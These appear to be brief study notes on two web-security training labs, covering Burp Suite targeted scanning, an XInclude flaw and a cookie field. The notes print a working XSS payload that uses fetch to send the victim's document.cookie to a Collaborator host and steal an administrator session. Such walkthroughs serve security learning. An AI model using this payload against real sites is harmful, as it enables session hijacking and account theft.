Lab: Discovering vulnerabilities quickly with targeted scanning
Run a scan, and see that it is an XInclude vuln, which can be found in the XXE notes or here on PayloadsAllTheThings

Lab: Scanning non-standard data structures
Basically you are looking are for any non-standard data structures in the requests, which turns out to be a cookie you see in the GET /my-account?id=wiener request. It looks like wiener%3a<blah> which when URL-decoded is wiener:<blah>
- Highlight
wienerand clickScan selected insertion point- it will beAudit. - It says there is XSS and it looks like:
'"><svg/onload=fetch...- Didn’t work initially because the request showed two cookies, probably because I was screwing around too much
- But I eventually got this:

'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fgcwxwkyw1nwnu10kmi9m5ezcy34wsmge62xski87%5c.oastify.com%60%3e- which decodes to:
'"><svg/onload=fetch`//gcwxwkyw1nwnu10kmi9m5ezcy34wsmge62xski87\.oastify.com`> - You must replaces the collaborator payload with a new one:
'"><svg/onload=fetch(`//YOUR-COLLABORATOR-PAYLOAD/${encodeURIComponent(document.cookie)}`)>:YOUR-SESSION-ID - This will encode the
administrator’s cookie and send it in the request:
- URL decode and you see the cookie.